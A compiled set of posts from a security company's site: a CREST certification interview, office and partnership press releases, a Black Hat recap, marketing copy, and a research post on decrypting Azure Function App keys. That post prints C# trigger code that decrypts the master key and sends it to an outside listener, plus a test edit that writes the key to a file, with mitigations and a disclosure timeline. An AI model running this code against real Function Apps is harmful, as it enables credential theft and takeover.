Q&A with Tyler Sullivan: The Journey to CREST Certification

Learn about the journey to CREST certification directly from our offensive security consultants. CREST certification is an accreditation that establishes professional standards for penetration testing. 
This Q&A between NetSPI EMEA Services Director Sam Kirkman and Senior Security Consultant Tyler Sullivan takes you through the process to achieve the CREST Certified Tester (CCT) qualification and how it enables NetSPI to better serve clients across the globe. 

Watch the video below or read along with the Q&A.

Tyler, why don’t you start off with a bit of an intro about yourself?

“I first got into cybersecurity while I was at university doing computer science and found it to be really interesting and had a real passion for it. So, I did my dissertation on cybersecurity. And after university, I was lucky enough to land a graduate job as a consultant. And this was sort of where my journey really began. I did a lot of web application testing and a lot of infrastructure testing, but particularly enjoyed web testing […] And so that led me down the route of getting some qualifications in web security. And I went for and have achieved the CREST certification.” 

Why is it important to achieve CREST certification?

In the UK in particular, CREST is a respected and well-known organisation. They accredit a lot of companies and certify a lot of individuals, so it’s a logical path for penetration testers to go down. Traditionally, individuals start out with the CREST Practitioner Security Examination Analyst (CPSA) examination.  

For a security consultant just starting out, it’s useful to have that first goal of passing the CPSA examination. When consultants start learning more about cybersecurity, then they can do the CREST registered tester (CRT) exam.  

“What really drove me towards those exams initially was that it made sense logically and had a progression. But also, they’re well respected and challenging exams. If it’s difficult to get [these certifications], they’re going to come with a lot of respect and really showcase your web skills.” 

What is the journey like to pass the CPSA exam? Is it challenging right from the start?

When you’re working toward CPSA, it can seem a bit daunting as your first qualification in the industry. At first, there are a lot of simple fundamentals to learn but at the same time, it can be challenging as a new professional in the industry. The timeline between the exams is well laid out, which makes it manageable.  

The CPSA is helpful because it teaches the necessary fundamentals, and the CRT is more of a little bit of everything and covers a lot more about web infrastructure. At the time, when preparing for these exams, you should be at least a mid-level tester.

When you get to the specific specialties, either application testing (CCT App) or infrastructure testing (CCT Inf), that’s when you put your head down and focus. The final section is broken into two additional parts. So, you have this multiple choice, which is kind of like CPSA, but much harder, and a lot more information. And then you come to the practical exam, where you have an assault course and a scenario, which lasts about a day.  

“I found the exam really tough, but really rewarding […] By the end of it, your brain is fried, because it’s just a really tough exam. But yeah, I passed in February last year and it’s probably my best achievement in the industry so far.” 

Does being CREST-certified change the way you can have conversations with customers and the way that they look at you as well?

CREST is well known in the UK especially because a lot of companies and clients do look for CREST certification and accreditation. One thing that is useful is that when you’re speaking with a client, you can be introduced as a CREST-certified tester. When clients look it up, they’ll see that it’s one of the best, most comprehensive web exams in the UK and one of the best in the world if you’re looking globally.  

Overall, being CREST-certified makes it easier because clients can see that you’re knowledgeable. If you have this qualification, it shows that not only do you have theory knowledge, but also practical real-world cybersecurity experience and pentesting experience. 

Do the skills developed during CREST exams help in the real world and in your day-to-day job as a penetration tester?

Knowledge from the exam is useful in day-to-day job scenarios. The exam teaches you how to deal with problems and unexpected inputs and scenarios, which is basically what penetration testing is. It’s seeing something you haven’t seen before and knowing how to apply certain theories that you’ve learned in different ways. And it’s not always the same formula, it’s very different each time.

The exam also has an element of reporting in there, which is obviously very important. At the end of the day, the report is what the client sees. And if you can’t communicate the results properly, then the client is not able to fix what is shown in the results.  

The CREST certification provides a great base and advanced knowledge and enables you to venture out into very niche parts of cybersecurity. However, it’s important to always continue learning.  

“A lot of my learning happens outside of the qualifications as well. Being on the team here at NetSPI, there are a lot of talented people, not just talented in web security, but we have really good cloud people. It’s hardware hackers, I don’t think I’ve ever been in an environment where there are just so many specialists. And it’s really good, because everything that you learn from even people that are doing hardware, hacking something so different. Being on the NetSPI team is a constant learning experience, I think in cybersecurity and penetration testing it’s impossible to ever stop learning.”  

Qualifications provide structure and a sense of achievement. And in the cybersecurity industry, continual learning is always important as the threat landscape continues to evolve. You mentioned that you never stop learning, have you decided what comes next for you?

“I think at the moment, I’m really enjoying just being able to have the freedom to go investigate something, or potentially go develop something. So, I think as a cyber professional, you do have to be able to do a little bit of everything. So, I’ve done a lot of development work recently and I’ve been enjoying writing some plugins and things that helped me become a better tester and more efficient tester. For the time being, I’ll keep doing this for another two years, then I’ll have to renew my credit certification.” 

Is NetSPI CREST-accredited?

Yes, NetSPI is a CREST member organisation and a CREST-accredited penetration testing service provider. You can find our profile online here

Does NetSPI have CREST-certified consultants?

Yes, NetSPI employs multiple CREST-registered and -certified penetration testers. CREST Registered Tester (CRT) is a mid-level qualification. CREST Certified Tester (CCT) is the higher level qualification, earned for either application testing (CCT App) or infrastructure testing (CCT Inf). 

Partner with NetSPI’s team of expert pentesters

NetSPI’s team of expert pentesters is available to provide always-on security, whether you need to scope a new engagement, parse real-time vulnerability reports, prioritise remediation, or ensure compliance. Learn more about NetSPI’s penetration testing as a service (PTaaS) or schedule a demo to speak with our team directly.


Minneapolis/St. Paul Business Journal: NetSPI moving to new North Loop HQ, takes over part of Calabrio sublease

NetSPI’s new Minneapolis headquarters was announced in the Minneapolis-St. Paul Business Journal. Read about the move in the snippet below and online here:


Minneapolis-based NetSPI is planning to move to a new North Loop headquarters, taking over half of the sublease space put on the market by Calabrio Inc. late last year.

The cybersecurity company will move into 60,000 square feet of space on the

11th and 12th floors of the Steelman Exchange building, at 241 Fifth Ave. N. Those floors – plus floors nine and 10 – are leased by Calabrio, a developer of call-center software, but were put up for sublease at the end of last year.

Read the full article here.


NetSPI Moves to New Minneapolis Headquarters to Accommodate Growth

The new, collaborative office space signals accelerated innovation and growth for the offensive security company.

Minneapolis, MN – August 29, 2023NetSPI, the global leader in offensive security, today announced its new headquarters location in the Steelman Exchange building in Minneapolis, Minnesota. The decision to move was prompted by the increasing employee headcount and the need for a more collaborative workplace as the company continues to experience rapid adoption. In 2023 to date, NetSPI has hired 150+ employees, completed 2,733 offensive security assessments, and welcomed 238 new customers. 

“The Steelman Exchange is the perfect fit for our team as we enter a momentous and pivotal year for NetSPI,” shared Aaron Shilts, CEO at NetSPI. “This investment in our workplace will nurture our continued growth, promote collaboration and innovation in offensive security, and ensure we maintain the unique culture that makes NetSPI so special.” 

There are several initiatives driving the offensive security company’s growth in 2023, including: 

  • Emphasis on defining NetSPI’s offensive security product roadmap and vision, driven by continuous adoption of the company’s Penetration Testing as a Service (PTaaS), Attack Surface Management (ASM), and Breach and Attack Simulation (BAS) platforms. 
  • Numerous innovations from the NetSPI Labs research and development team, including the launch of the Software as a Service (SaaS) Security Assessment and AI/ML Penetration Testing solutions. Along with ongoing industry research and responsible disclosures, including two Azure vulnerability disclosures from the NetSPI cloud penetration testing team. 
  • Recognition for its Attack Surface Management (ASM) solution by Gartner, Forrester, and the Global Infosec Awards. 
  • Expansion of the EMEA pentesting team and formalization of CREST and CHECK accreditations to perform mandated pentests in the region. 
  • Strategic leadership and Board of Directors appointments, including Vinay Anand as Chief Product Officer, Jay Golonka as Chief Financial Officer, Nick Walker as Director of EMEA, and Scott Lundgren and John Spiliotis as members of the Board of Directors. 
  • Exponential NetSPI Partner Program growth, with the introduction of 29 new partnerships in 2023 to date, including BMC Software, Optum, and Chubb. 
  • The release of NetSPI’s inaugural Offensive Security Vision Report, with valuable insights on the top vulnerabilities by attack surface, the state of remediation, and cybersecurity hiring trends. 
  • The acquisition of nVisium which continues to support scalability and delivery of its offensive security solutions.

NetSPI has been honored as a Top Workplaces USA winner for the past two years and as one of the best places to work in the state of Minnesota for three consecutive years. This year, the company ranked #12 on the midsize companies list, with special recognition for its innovation, employee appreciation, work-life flexibility, compensation and benefits, leadership, and purpose and values. 

“We will continue to prioritize flexible and remote work options as a company,” explained Heather Crosley, VP of People Operations. “At the same time, we recognize that an intentional space to connect in-person can make an incredible impact on our ability to collaborate, innovate, and deliver the best offensive security solutions globally. And that’s exactly what this new space is designed to do.” 

The move will take place in January 2024 and NetSPI will remain at its current headquarters at 800 N Washington Ave #670 in Minneapolis until then.  

Michael Anderstrom at Colliers represented NetSPI in the transaction.  

Visit to explore open roles in Minneapolis and its other US, India, Canada, and UK locations.

About NetSPI

NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India. 

Media Contacts:
Tori Norris, NetSPI
(630) 258-0277

Jessica Bettencourt, Inkhouse for NetSPI
(774) 451-5142


What the Function: Decrypting Azure Function App Keys 

When deploying an Azure Function App, you’re typically prompted to select a Storage Account to use in support of the application. Access to these supporting Storage Accounts can lead to disclosure of Function App source code, command execution in the Function App, and (as we’ll show in this blog) decryption of the Function App Access Keys.

Azure Function Apps use Access Keys to secure access to HTTP Trigger functions. There are three types of access keys that can be used: function, system, and master (HTTP function endpoints can also be accessed anonymously). The most privileged access key available is the master key, which grants administrative access to the Function App including being able to read and write function source code.  

The master key should be protected and should not be used for regular activities. Gaining access to the master key could lead to supply chain attacks and control of any managed identities assigned to the Function. This blog explores how an attacker can decrypt these access keys if they gain access via the Function App’s corresponding Storage Account. 


  • Function App Access Keys can be stored in Storage Account containers in an encrypted format 
  • Access Keys can be decrypted within the Function App container AND offline 
  • Works with Windows or Linux, with any runtime stack 
  • Decryption requires access to the decryption key (stored in an environment variable in the Function container) and the encrypted key material (from host.json). 

Previous Research 


Function Apps depend on Storage Accounts at multiple product tiers for code and secret storage. Extensive research has already been done for attacking Functions directly and via the corresponding Storage Accounts for Functions. This blog will focus specifically on key decryption for Function takeover. 

Required Permissions 

  • Permission to read Storage Account Container blobs, specifically the host.json file (located in Storage Account Containers named “azure-webjobs-secrets”) 
  • Permission to write to Azure File Shares hosting Function code
Screenshot of Storage Accounts associated with a Function App

The host.json file contains the encrypted access keys. The encrypted master key is contained in the masterKey.value field.

  "masterKey": { 
    "name": "master", 
    "encrypted": true 
  "functionKeys": [ 
      "name": "default", 
      "encrypted": true 
  "systemKeys": [],
  "hostName": "",
  "instanceId": "dc[TRUNCATED]c3",
  "source": "runtime",
  "decryptionKeyId": "MACHINEKEY_DecryptionKey=op+[TRUNCATED]Z0=;"

The code for the corresponding Function App is stored in Azure File Shares. For what it’s worth, with access to the host.json file, an attacker can technically overwrite existing keys and set the “encrypted” parameter to false, to inject their own cleartext function keys into the Function App (see Rogier Dijkman’s research). The directory structure for a Windows ASP.NET Function App (thisisnotrealprobably) typically uses the following structure: 

A new function can be created by adding a new set of folders under the wwwroot folder in the SMB file share. 

The ability to create a new function trigger by creating folders in the File Share is necessary to either decrypt the key in the function runtime OR return the decryption key by retrieving a specific environment variable. 

Decryption in the Function container 

Function App Key Decryption is dependent on ASP.NET Core Data Protection. There are multiple references to a specific library for Function Key security in the Function Host code.  

An old version of this library can be found at This library creates a Function specific Azure Data Protector for decryption. The code below has been modified from an old MSDN post to integrate the library directly into a .NET HTTP trigger. Providing the encrypted master key to the function decrypts the key upon triggering. 

The sample code below can be modified to decrypt the key and then send the key to a publicly available listener. 

#r "Newtonsoft.Json" 

using Microsoft.AspNetCore.DataProtection; 
using Microsoft.Azure.Web.DataProtection; 
using System.Net.Http; 
using System.Text; 
using System.Net; 
using Microsoft.AspNetCore.Mvc; 
using Microsoft.Extensions.Primitives; 
using Newtonsoft.Json; 

private static HttpClient httpClient = new HttpClient(); 

public static async Task<IActionResult> Run(HttpRequest req, ILogger log) 
    log.LogInformation("C# HTTP trigger function processed a request."); 

    DataProtectionKeyValueConverter converter = new DataProtectionKeyValueConverter(); 
    string keyname = "master"; 
    string encval = "Cf[TRUNCATED]NQ"; 
    var ikey = new Key(keyname, encval, true); 

    if (ikey.IsEncrypted) 
        ikey = converter.ReadValue(ikey); 
    // log.LogInformation(ikey.Value); 
    string url = "https://[TRUNCATED]"; 
    string body = $"{{"name":"{keyname}", "value":"{ikey.Value}"}}"; 
    var response = await httpClient.PostAsync(url, new StringContent(body.ToString())); 

    string name = req.Query["name"]; 

    string requestBody = await new StreamReader(req.Body).ReadToEndAsync(); 
    dynamic data = JsonConvert.DeserializeObject(requestBody); 
    name = name ?? data?.name; 

    string responseMessage = string.IsNullOrEmpty(name) 
        ? "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 
                : $"Hello, {name}. This HTTP triggered function executed successfully."; 

            return new OkObjectResult(responseMessage); 

class DataProtectionKeyValueConverter 
    private readonly IDataProtector _dataProtector; 
    public DataProtectionKeyValueConverter() 
        var provider = DataProtectionProvider.CreateAzureDataProtector(); 
        _dataProtector = provider.CreateProtector("function-secrets"); 

    public Key ReadValue(Key key) 
        var resultKey = new Key(key.Name, null, false); 
        resultKey.Value = _dataProtector.Unprotect(key.Value); 
        return resultKey; 

class Key 
    public Key(){} 

    public Key(string name, string value, bool encrypted) 
        Name = name; 
        Value = value; 
        IsEncrypted = encrypted; 

    [JsonProperty(PropertyName = "name")] 
    public string Name { get; set; } 

    [JsonProperty(PropertyName = "value")] 
    public string Value { get; set; } 

    [JsonProperty(PropertyName = "encrypted")] 
    public bool IsEncrypted { get; set; }

Triggering via browser: 

Screenshot of triggering via browser saying This HTTP triggered function executed successfully. Pass a name in the query body for a personalized response.

Burp Collaborator:

Screenshot of Burp collaborator.

Master key:

Screenshot of Master key.

Local Decryption 

Decryption can also be done outside of the function container. The repo contains an older version of the code that can be pulled down and run locally through Visual Studio. However, there is one requirement for running locally and that is access to the decryption key.

The code makes multiple references to the location of default keys:

The Constants.cs file leads to two environment variables of note: AzureWebEncryptionKey (default) or MACHINEKEY_DecryptionKey. The decryption code defaults to the AzureWebEncryptionKey environment variable.  

One thing to keep in mind is that the environment variable will be different depending on the underlying Function operating system. Linux based containers will use AzureWebEncryptionKey while Windows will use MACHINEKEY_DecryptionKey. One of those environment variables will be available via Function App Trigger Code, regardless of the runtime used. The environment variable values can be returned in the Function by using native code. Example below is for PowerShell in a Windows environment: 


This can then be returned to the user via an HTTP Trigger response or by having the Function send the value to another endpoint. 

The local decryption can be done once the encrypted key data and the decryption keys are obtained. After pulling down the GitHub repo and getting it setup in Visual Studio, quick decryption can be done directly through an existing test case in DataProtectionProviderTests.cs. The following edits can be made.

// Copyright (c) .NET Foundation. All rights reserved. 
// Licensed under the MIT License. See License.txt in the project root for license information. 

using System; 
using Microsoft.Azure.Web.DataProtection; 
using Microsoft.AspNetCore.DataProtection; 
using Xunit; 
using System.Diagnostics; 
using System.IO; 

namespace Microsoft.Azure.Web.DataProtection.Tests 
    public class DataProtectionProviderTests 
        public void EncryptedValue_CanBeDecrypted()  
            using (var variables = new TestScopedEnvironmentVariable(Constants.AzureWebsiteLocalEncryptionKey, "CE[TRUNCATED]1B")) 
                var provider = DataProtectionProvider.CreateAzureDataProtector(null, true); 

                var protector = provider.CreateProtector("function-secrets"); 

                string expected = "test string"; 

                // string encrypted = protector.Protect(expected); 
                string encrypted = "Cf[TRUNCATED]8w"; 

                string result = protector.Unprotect(encrypted); 

                File.WriteAllText("test.txt", result); 
                Assert.Equal(expected, result); 

Run the test case after replacing the variable values with the two required items. The test will fail, but the decrypted master key will be returned in test.txt! This can then be used to query the Function App administrative REST APIs. 

Tool Overview 

NetSPI created a proof-of-concept tool to exploit Function Apps through the connected Storage Account. This tool requires write access to the corresponding File Share where the Function code is stored and supports .NET, PSCore, Python, and Node. Given a Storage Account that is connected to a Function App, the tool will attempt to create a HTTP Trigger (function-specific API key required for access) to return the decryption key and scoped Managed Identity access tokens (if applicable). The tool will also attempt to cleanup any uploaded code once the key and tokens are received.  

Once the encryption key and encrypted function app key are returned, you can use the Function App code included in the repo to decrypt the master key. To make it easier, we’ve provided an ARM template in the repo that will create the decryption Function App for you.

Screenshot of welcome screen to the NetSPI "FuncoPop" app (Function App Key Decryption).

See the GitHub link for more info. 

Prevention and Mitigation 

There are a number of ways to prevent the attack scenarios outlined in this blog and in previous research. The best prevention strategy is treating the corresponding Storage Accounts as an extension of the Function Apps. This includes: 

  1. Limiting the use of Storage Account Shared Access Keys and ensuring that they are not stored in cleartext.
  1. Rotating Shared Access Keys. 
  1. Limiting the creation of privileged, long lasting SAS tokens. 
  1. Use the principle of least privilege. Only grant the least privileges necessary to narrow scopes. Be aware of any roles that grant write access to Storage Accounts (including those roles with list key permissions!) 
  1. Identify Function Apps that use Storage Accounts and ensure that these resources are placed in dedicated Resource Groups.
  1. Avoid using shared Storage Accounts for multiple Functions. 
  1. Ensure that Diagnostic Settings are in place to collect audit and data plane logs. 

More direct methods of mitigation can also be taken such as storing keys in Key Vaults or restricting Storage Accounts to VNETs. See the links below for Microsoft recommendations. 

MSRC Timeline 

As part of our standard Azure research process, we ran our findings by MSRC before publishing anything. 

02/08/2023 – Initial report created
02/13/2023 – Case closed as expected and documented behavior
03/08/2023 – Second report created
04/25/2023 – MSRC confirms original assessment as expected and documented behavior 
08/12/2023 – DefCon Cloud Village presentation 

Thanks to Nick Landers for his help/research into ASP.NET Core Data Protection. 


Back in Black (Hat): Here’s What Stole the Show

As August comes to a close, we’re reliving the highlights from Black Hat 2023! Our team had a great time at this year’s event, complete with attending (and leading) workshops, launching new products, and of course, memorable evenings in the heart of Las Vegas.

To all the NetSPI team members who attended Black Hat (and DEF CON 31!), and the key players who held down our home base, thank you for making this year’s conference a success! Tapping into this year’s theme, we really are better together. We asked a few of our offensive security experts to weigh in on the key themes, favorite conversations, and more details on what stole the show this year. 

3 Key Themes from Black Hat 2023 

NetSPI Field CISO Nabil Hannan shared four themes from Black Hat:  

  1. AI/ML was pervasive across vendors 
  2. More focus on AppSec, especially integrating it into CI/CD pipelines 
  3. Lots of interest in automotive, aerospace, and IoT security 

Let’s explore these. 

AI Stole the Show 

A key theme at Black Hat was AI leading innovation in technology. Many vendors had AI-powered platforms on display — NetSPI included. Looking at the security industry as a whole, we’re still in the infancy of our collective AI journey. AI is powerful, but navigating this space alone is challenging. 

NetSPI launched AI/ML Penetration Testing to help trailblazing companies stay creative with AI while remaining confident in the security of their new technologies. We’ve only begun to see the changes AI and ML can bring to security, and we can’t wait to build the next evolution together. 

AI/ML Penetration Testing

All about AppSec 

Incorporating security into the application lifecycle is easier said than done. Fortunately the industry is increasingly invested in security best practices throughout the development and testing phases to help address common risks. Peek the OWASP API Security Top 10 for the most prevalent vulnerabilities. Nabil noted that application security is being added specifically into continuous integration and continuous delivery (CI/CD) pipelines, meaning development teams have moved beyond AppSec in theory and into implementing it as a process. 

Automotive. Aerospace. IoT. Oh My!  

Digital transformation and Internet of Things (IoT) go hand-in-hand. And if those weren’t enough buzzwords for you, here’s one more: The digital footprint companies have today is vastly larger and more dynamic than ever before. Internet-facing technology holds a higher potential for exposure to threats because it has multiple access points with greater public accessibility. One of NetSPI’s specialties is IoT Penetration Testing across industries to help internet-facing assets remain secure.  

NetSPI Director of IoT and Embedded Pentesting Larry Trowell noted aerospace as a trending industry at Black Hat because of its broad coverage area. As connected devices continue to become a must-have instead of a nice-to-have, security will progress as a necessity. 

Bonus Theme: Azure Cloud Security 

Okay, we’re cheating a little here as this was more a DEF CON theme versus Black Hat, but “hacker summer camp” nevertheless. Our resident Azure security expert and tenured DEF CON volunteer Karl Fosaaen made his way to Vegas for DEF CON 31. This year was extra special as Karl brought his dad along to experience the event for the first time! 

In the wake of Tenable CEO Amit Yoran calling out Microsoft for its handling of vulnerability disclosures, Azure security was certainly a topic of conversation across the community. NetSPI had two opportunities to provide insights on how to navigate Azure cloud security concerns. 

Karl was invited to speak with Ashish Rajan, host of the Cloud Security Podcast, on Azure insecurities, why pentesting must go beyond configuration reviews, the difference between testing AWS versus Azure, practical steps to strengthen Azure security, common attack TTPs, and more. The episode will air on Monday, August 28 – keep an eye out! 

Later at the DEF CON Cloud Village, Karl and NetSPI’s cloud pentesting lead Thomas Elling led a talk titled, What the Function: A Deep Dive into Azure Function App Security. The talk centered around the security risks associated with the increasing use of Platform as a Service (PaaS) resources in the cloud, specifically the use of the Azure Function App service. If you missed the talk, no worries! They followed the session up with a detailed write-up on the NetSPI technical blog

What the Function: Decrypting Azure Function App Keys

What’s it Take to Be a Global Leader?  

Several companies at Black Hat self-proclaimed the title “leader” on their booths, enticing a curious mind to pose a question: what merits the claim of a leader? While we can’t speak for other companies, we can give insight into why NetSPI claims the title of global leader in offensive security. 

The consensus is that third-party mentions from well-known firms such as Gartner and Forrester may convince decision-makers to claim the title of leader in their industry. We’d be remiss if we didn’t agree. NetSPI’s inclusion in Forrester’s The External Attack Surface Management Landscape, Q1 2023 and The Gartner® Competitive Landscape: External Attack Surface Management was positive for our ASM technology platform. 

In addition to third-party recognition, we hold the title of leader because we are trailblazing a path forward in offensive security so that teams have a partner in navigating this complex space. Our suite of offensive security solutions consolidates services with one vendor, giving us a deep understanding of client systems for more tailored recommendations. 

NetSPI Chief of Product Vinay Anand spoke to this in his Black Hat presentation, Defining a Roadmap for Offensive Security. The presentation covered the past, present, and future of proactive security measures, why offensive security is today’s North Star for risk and exposure management, and how to make progress toward an offensive security strategy. Grab Vinay’s slides here.  

NetSPI Chief of Product Vinay Anand during his Black Hat presentation, Defining a Roadmap for Offensive Security.

Lastly, we invite you to meet our pentesting team, check out our recent research, and view our open-source tools. We guarantee you’ll learn something that could only be taught by leaders in their field. 

Between the learning opportunities, building connections new and old, and having great food and conversation with our trusted customers and peers, Black Hat lived up to its hype. Until next year!


Attack Surface Management vs. External Network Penetration Testing

External Network Penetration Testing and Attack Surface Management (ASM) are related but distinct offensive security measures. Each one has a time and place where it’s most effective, but when the two are paired together, security teams experience an extremely proactive approach to their cybersecurity program that ensures improvement over time. Experience this modern approach to security and save 30% with NetSPI’s ASM + ExPen bundle!

What is External Network Penetration Testing?  

External Network Penetration Testing provides a point-in-time test that dives deep into a defined scope. External Network Testing means an offensive security consultant is dedicated to analyzing selected assets for a specific amount of time. Think of this focused analysis for 40 hours a week for two weeks. That’s a lot of time to dig into findings!  

This amount of research typically results in a high number of results that are vetted into prioritized actions. The outcome can strain security teams because of the need to triage remediation efforts in a short period of time. External Network testing is a thorough method of evaluating vulnerabilities and reporting on whether they’re publicly exploitable. 

A limitation with External Network Testing is that it’s only focused on what’s in scope. The scope of the test is limited to the assets a client defines, and the scope of assets a client defines is limited to what a client knows is out there. If clients misunderstand their attack surface, it can lead to gaps in the scope of an External Network Penetration Test. Ensuring a strong and holistic understanding of your attack surface allows you to get more return on your investment for penetration testing. 

In addition, External Network Penetration Testing provides thorough research, but only for a specific point-in-time. Unfortunately, threat actors aren’t limited to scope or timelines like External Network Testing is, making Attack Surface Management a smart supplement to External Network Testing.

When to Use External Network Penetration Testing 

If you have proper asset mapping and a solid understanding of your attack surface, then External Network Penetration Testing is an ideal offensive security measure to test the security of your assets. 

ExPen vs. ASM


  • The ExPen is designed to report more findings to the security team
    • It will report information findings
  • These findings need to be triaged by the internal security team to determine which to prioritize
  • The ExPen is useful for getting a baseline point in time view of the environment but requires more manual work on the part of the internal security team


  • ASM will report less findings than the ExPen
  • ASM is designed to filter out alerts and only report vulnerabilities the team has confirmed they can exploit
  • This reduces the amount of triaging work for the internal security team
  • ASM is useful for getting a continuous view of the environment and can see changes as they happen in real time

What is Attack Surface Management?  

Attack Surface Management provides continuous discovery, inventory, testing, and prioritization of known and unknown assets and exposures on global external attack surfaces. While it doesn’t go as deep as External Network Penetration Testing, it does look at attack surfaces broadly and through a continuous lens. It provides an always-on view of high-impact, high-priority findings. 

One of the most common scenarios we face with clients is finding unknown assets. This is also one of the biggest benefits of ASM. Not only can many different assets exist on an external attack surface, but also these assets change over time, making point-in-time pentesting good, but continuous analysis better.  

First and foremost, ASM is focused on discovering what’s out there so we can bring better visibility into the entire external attack surface. Once we have that visibility and know the assets that exist, we look at exposures including vulnerabilities. ASM goes deeper by showing the products and certificates that exist on those assets, if those certificates are expiring soon, the DNS records, and the open ports on those assets. 

Typical ASM platforms result in alert overload, which is why NetSPI focuses on noise reduction with our technology. We take the results from our Attack Surface Management platform a step further by adding the human component. Our ASM operations team uses automated and manual methods to discover assets, monitor exposures, and determine the level of risk they may pose. This information is relayed to a security team for remediation, and then passed along to a pentester to validate the remediated exposure. 

When to Use Attack Surface Management 

Attack Surface Management is ideal for teams who need insight into their external attack surface and enhance the process for mapping their attack surface on a continual basis. 

Better Together: Attack Surface Management and External Network Penetration Testing  

Salt and pepper, Peanut butter and jelly, ASM and External Network Testing.  

Attack Surface Management shines with its always-on nature that regularly updates scan results with the latest changes. When we tie ASM to our External Network Testing, we’re more closely simulating the activity that attackers are taking throughout the year. ASM provides coverage in-between External Network Testing, which allows security teams to be more proactive with their approach, instead of waiting three, six or 12 months before performing a regular External Network Test. 

A common scenario in which ASM and External Network Testing benefit each other is when companies make recurring changes to their attack surfaces during the holidays. For example, many retailers will stand up new infrastructure for holiday specials. When the special ends and they take down that infrastructure, does it all get commissioned and decommissioned properly? This insight can be automated with ASM. 

The best mix of these offensive security strategies is to use ASM for constant monitoring, and then use the insights to perform an External Network Testing periodically, such as once per quarter. This strategy also has the potential to validate that security enhancements are resulting in continued improvements, which can help security leaders when it comes to resourcing modern security measures. 

We believe everyone should experience the benefit of ASM and External Network Testing together, which is why we’re offering a savings of 30% when bundling the two. Reach out today for a conversation on how ASM and External Network Testing can apply to your security program. 


NetSPI and BMC Collaborate to Strengthen Mainframe Security  

Minneapolis, MN – August 10, 2023NetSPI, the global leader in offensive security, has announced a strategic collaboration with BMC, a global leader in software solutions for the Autonomous Digital Enterprise, to strengthen mainframe security for their customers. The collaboration aligns with BMC’s commitment to partnering with best-of-breed security brands, enabling both companies to deliver enhanced cybersecurity solutions to organizations worldwide, with an emphasis on mainframe security. 

BMC customers will now have access to NetSPI’s comprehensive mainframe penetration testing solutions and state-of-the-art delivery platforms to evaluate network security from an adversarial perspective. In return, NetSPI solutions will use BMC Automated Mainframe Intelligence (BMC AMI) software assets, enabling automated vulnerability scanning to identify and address potential exploits. NetSPI will also contribute to the future development of the BMC AMI security portfolio, driving innovation in mainframe vulnerability management solutions.  

John McKenny, Senior Vice President and General Manager of Intelligent Z Optimization and Transformation at BMC, highlighted the benefits of the effort, stating, “Our customers will benefit from independent pentesting services delivered by NetSPI, a world-leading brand in the cybersecurity field. Their expertise and insights on mainframe security will play a pivotal role in shaping the future of our BMC AMI Security portfolio.” 

“Mainframes still hold critical information and perform critical functions for a lot of large enterprises today. Regular security testing must be prioritized,” stated Philip Young, Director of Mainframe Pen-testing at NetSPI. “Enterprises can’t afford downtime on their mainframes. This collaboration ensures our mutual customers the best protection so they can continue innovating – with confidence.” 

Lauren Gimmillaro, VP Business Development and Strategic Alliances at NetSPI, expressed her excitement about the new offerings, saying, “We are thrilled to join forces with BMC Software. This collaboration not only expands the reach of our offensive security solutions but also provides us with an opportunity to contribute to the BMC AMI Security portfolio, driving innovation and delivering comprehensive vulnerability management solutions to organizations worldwide.” 

For more information on BMC and NetSPI, please visit the following websites: 

About NetSPI

NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India. 

BMC, BMC Software, the BMC logo, and other BMC marks are the exclusive properties of BMC Software, Inc. and are registered or may be registered with the U.S. Patent and Trademark Office or in other countries.

Media Contacts:
Tori Norris, NetSPI
(630) 258-0277

Jessica Bettencourt, Inkhouse for NetSPI
(774) 451-5142 


Channel Futures: AI and Cybersecurity Take Center Stage at Largest-Ever Black Hat USA 

Channel Futures rounds up the biggest headlines from Black Hat 2023, including NetSPI’s debut of AI/ML Penetration Testing. Learn more and hear from NetSPI’s vice president of business development and strategic alliances, Lauren Gimmillaro on slide 10 of the article here.


Also at Black Hat, NetSPI debuted its machine learning/artificial intelligence (ML/AI) penetration testing solution aimed at bringing a more holistic and proactive approach to safeguarding ML model implementations. 

The solution focuses on two core components. Those are identifying, analyzing and remediating vulnerabilities on ML systems such as large language models (LLMs), and providing grounded advice and real-world guidance to ensure security is considered from inception to implementation. 

As adoption of ML and AI accelerates, organizations must understand the unique threats that accompany this technology to better identify areas of weakness and build more secure models, according to NetSPI. 

Lauren Gimmillaro, NetSPI’s vice president of business development and strategic alliances, said NetSPI’s partners can help their customers navigate their ML/AI security challenges with confidence, backed by NetSPI’s expertise in ML and data science to help them secure their innovation. 

“This new testing capability will open opportunities across their customers’ tech stack, including cloud, web and applications as our reports and recommendations for remediation are brought to them in real time,” she said. “Some specific examples of new opportunities include data set security, adversarial testing and API security.” 

AI innovation and the fast adoption of ML systems into production is happening whether companies are ready or not, Gimmillaro said. 

“It’s critical that we help our partners cater to a diverse range of industries and deployments in this space, from chatbots to data analytics, to text generation and everything in between,” she said. “Our testing methodology is rooted in adversarial ML and backed by a team of over 200 pen-testing experts that are equipped to test against real adversarial attack techniques. This is the advantage we help our partners deliver to their customers.” 

You can read the full article here.


SiliconANGLE: NetSPI bridges security gaps with new ML/AI pentesting solution

SiliconANGLE shared NetSPI’s announcement of AI/ML Penetration Testing on August 8, 2023 covering how the new solution brings a more holistic and proactive approach to safeguarding machine learning model implementations. Read the full story here.  


Cybersecurity services and software provider NetSPI LLC today announced a new machine learning and artificial intelligence penetration testing solution to bring a more holistic and proactive approach to safeguarding machine learning model implementations. 

Claimed to be the first of its kind, NetSPI’s ML/AI Pentesting solution focuses on two core components: identifying, analyzing and remediating vulnerabilities on machine learning systems such as large language models, and providing grounded advice and real-world guidance to ensure security is considered from ideation to implementation. 

